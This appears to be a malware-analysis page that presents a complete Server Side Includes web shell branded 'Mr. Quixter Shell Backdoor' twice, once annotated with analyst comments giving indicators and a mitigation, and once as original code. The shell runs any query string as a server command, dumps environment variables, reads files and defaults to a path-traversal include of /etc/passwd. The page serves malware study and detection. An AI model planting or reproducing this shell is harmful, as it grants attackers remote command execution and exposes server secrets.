PHP Malware Analysis


Tags

URLs
https://mr-quixter.blogspot.com
https://mr-quixter.blogspot.com

Deobfuscated code

<!-- Analyst note: this sample is a Server Side Includes (SSI) web shell, not PHP. Every directive below is evaluated by the web server before the page is sent, and the raw request query string is the only input it reads. -->
<!-- Static strings visible in this sample that can serve as content indicators: the errmsg text "[Error in shell]", the page title "Shell Mr. Quixter" and the banner "Mr. Quixter Shell Backdoor". -->
<!-- Mitigation note: the exec directive used further down only works where SSI command execution is enabled; on Apache httpd, Options IncludesNOEXEC permits SSI while disabling it. -->
<!-- Replaces the server's SSI error message with a fixed string, so a failing directive prints "[Error in shell]". -->
<!--#config errmsg="[Error in shell]"-->
<!-- Empty variable used below as the comparison value for "no query string was supplied". -->
<!--#set var="zero" value="" -->
<!-- First branch pair: choose the command. With an empty query string, shl defaults to a directory listing; otherwise shl is the entire query string. -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="shl" value="ls -al" -->
<!--#else -->
<!--#set var="shl" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<!-- Second branch pair: choose the include target. With an empty query string, inc defaults to a path-traversal string ending in /etc/passwd; otherwise inc is the same query string as shl, so one request feeds both the exec and the include directive. -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="inc" value="/../../../../../../../etc/passwd" -->
<!--#else -->
<!--#set var="inc" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<html>
<head>
<title>
Shell Mr. Quixter
</title>
<script language="javascript">
// Client-side helper for the "Run" button of the command box.
// The server substitutes this document's own name into the string, so the
// browser reloads the same page with the typed text as the whole query string.
// Log-review note: the resulting requests carry a bare command after "?",
// not key=value pairs.
function fex()
{
document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+document.getElementById('command').value;
}
// Client-side helper for the "View file" button: same reload, but the query
// string is the literal prefix "cat " followed by the path from the vfile box.
function vfile()
{
document.location.href="<!--#echo var=DOCUMENT_NAME -->?cat "+document.getElementById('vfile').value;
}
</script>
</head>
<body bgcolor=#e4e0d8 alink=blue vlink=blue>
<!-- Banner linking to the author's blog; the same URL is listed as an extracted indicator on this page. -->
<div align=center width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+2><a href=https://mr-quixter.blogspot.com>Mr. Quixter Shell Backdoor</a></font></b></center>
</div>
<br>
<!-- "Shell info" panel: prints standard SSI variables (dates, document name and URI, last-modified time, file owner) through the echo directive. Information disclosure only; nothing is executed here. -->
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Shell info</font></b></center>
<br>
<b><font color=blue>GMT date</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DATE_GMT --></b><br>
<b><font color=blue>Local date</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DATE_LOCAL --></b><br>
<b><font color=blue>Document name</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DOCUMENT_NAME --></b><br>
<b><font color=blue>Document URI</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DOCUMENT_URI --></b><br>
<b><font color=blue>Last modified</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=LAST_MODIFIED --></b><br>
<b><font color=blue>Owner</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=USER_NAME --></b><br>
<br>
</div>
<br>
<!-- "Server info" panel: the printenv directive dumps every variable visible to the SSI processor into the page, which exposes the server environment to whoever loads it. -->
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Server info</font></b></center>
<br>
<pre>
<!--#printenv-->
</pre>
<br>
</div>
<br>
<!-- Input panel: a single text box whose content fex() turns into the query string. The heading states that the same value is used both as shell command and as include address. -->
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Command for shell & address for inclusion</font></b></center>
<br>
<b><font color=blue>Enter command/address</font></b>:&nbsp;&nbsp;&nbsp;<input type=text size=80 id=command>&nbsp;<input type=button value=Run onclick=fex();>
<br>
</div>
<br>
<!-- "Shell" panel: this is the command-execution sink. The value of shl (the query string, or "ls -al" by default) is first echoed back and then handed to the exec directive; its output is rendered in the textarea. -->
<!-- NOTE(review): the command presumably runs with the privileges of the web server process; confirm against the host configuration. -->
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Shell</font></b></center>
<br>
<b><font color=blue>Executed command</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=shl --></b><br>
<textarea bgcolor=#e4e0d8 cols=121 rows=15>
<!--#exec cmd=$shl -->
</textarea>
<br>
</div>
<br>
<!-- "Operations on files" panel: the vfile box is prefilled with the shell's own SCRIPT_FILENAME, and its button sends "cat <path>" as the query string. Below it, the value of inc is echoed and passed to the include directive as a virtual path. -->
<!-- NOTE(review): whether the default traversal string actually resolves outside the document root depends on how the server normalises virtual include paths; verify on the affected server. -->
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Operations on files</font></b></center>
<br>
<b><font color=blue>View file (cat)</font></b>:&nbsp;&nbsp;&nbsp;<input type=text size=80 id=vfile value=<!--#echo var=SCRIPT_FILENAME -->>&nbsp;<input type=button value=Run onclick=vfile();><br>
<b><font color=blue>Included file</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=inc --></b><br>
<textarea bgcolor=#e4e0d8 cols=121 rows=15>
<!--#include virtual=$inc -->
</textarea>
<br>
</div>
<br>
<!-- Footer: attribution text only, kept byte-for-byte as captured because it is part of the sample. -->
<!-- NOTE(review): the embedded comment in the next lines is mojibake; it looks like Windows-1251 Russian text read as Latin-1, roughly "copyright changed in 2011 ;)", which would suggest this is a rebranded copy of an older shell. Confirm against the raw bytes. -->
<!-- The Indonesian sentence is a group slogan, roughly: "We cyber activists are not people who know everything; we are only a group of people who make the best possible use of Google." -->
<div align=center width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1><a href=https://mr-quixter.blogspot.com>Touch Me!!</a></font></b><br><OneHatCyberTeam<!--êîïèðàéò ïîìåíÿí â 2011 ;) --></small><br>
Kami Penggiat Cyber Bukanlah Orang Yang Tau Akan Segalanya. Tapi Kami Hanyalah Sekelompok Orang Yang Memanfaatkan Google Dengan Sebaik-baiknya. <br> #Mr. Quixter
</center>
</div>
</body>
</html>


Original code

<!--#config errmsg="[Error in shell]"-->
<!--#set var="zero" value="" -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="shl" value="ls -al" -->
<!--#else -->
<!--#set var="shl" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="inc" value="/../../../../../../../etc/passwd" -->
<!--#else -->
<!--#set var="inc" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<html>
<head>
<title>
Shell Mr. Quixter
</title>
<script language="javascript">
function fex()
{
document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+document.getElementById('command').value;
}
function vfile()
{
document.location.href="<!--#echo var=DOCUMENT_NAME -->?cat "+document.getElementById('vfile').value;
}
</script>
</head>
<body bgcolor=#e4e0d8 alink=blue vlink=blue>
<div align=center width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+2><a href=https://mr-quixter.blogspot.com>Mr. Quixter Shell Backdoor</a></font></b></center>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Shell info</font></b></center>
<br>
<b><font color=blue>GMT date</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DATE_GMT --></b><br>
<b><font color=blue>Local date</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DATE_LOCAL --></b><br>
<b><font color=blue>Document name</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DOCUMENT_NAME --></b><br>
<b><font color=blue>Document URI</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DOCUMENT_URI --></b><br>
<b><font color=blue>Last modified</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=LAST_MODIFIED --></b><br>
<b><font color=blue>Owner</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=USER_NAME --></b><br>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Server info</font></b></center>
<br>
<pre>
<!--#printenv-->
</pre>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Command for shell & address for inclusion</font></b></center>
<br>
<b><font color=blue>Enter command/address</font></b>:&nbsp;&nbsp;&nbsp;<input type=text size=80 id=command>&nbsp;<input type=button value=Run onclick=fex();>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Shell</font></b></center>
<br>
<b><font color=blue>Executed command</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=shl --></b><br>
<textarea bgcolor=#e4e0d8 cols=121 rows=15>
<!--#exec cmd=$shl -->
</textarea>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Operations on files</font></b></center>
<br>
<b><font color=blue>View file (cat)</font></b>:&nbsp;&nbsp;&nbsp;<input type=text size=80 id=vfile value=<!--#echo var=SCRIPT_FILENAME -->>&nbsp;<input type=button value=Run onclick=vfile();><br>
<b><font color=blue>Included file</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=inc --></b><br>
<textarea bgcolor=#e4e0d8 cols=121 rows=15>
<!--#include virtual=$inc -->
</textarea>
<br>
</div>
<br>
<div align=center width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1><a href=https://mr-quixter.blogspot.com>Touch Me!!</a></font></b><br><OneHatCyberTeam<!--êîïèðàéò ïîìåíÿí â 2011 ;) --></small><br>
Kami Penggiat Cyber Bukanlah Orang Yang Tau Akan Segalanya. Tapi Kami Hanyalah Sekelompok Orang Yang Memanfaatkan Google Dengan Sebaik-baiknya. <br> #Mr. Quixter
</center>
</div>
</body>
</html>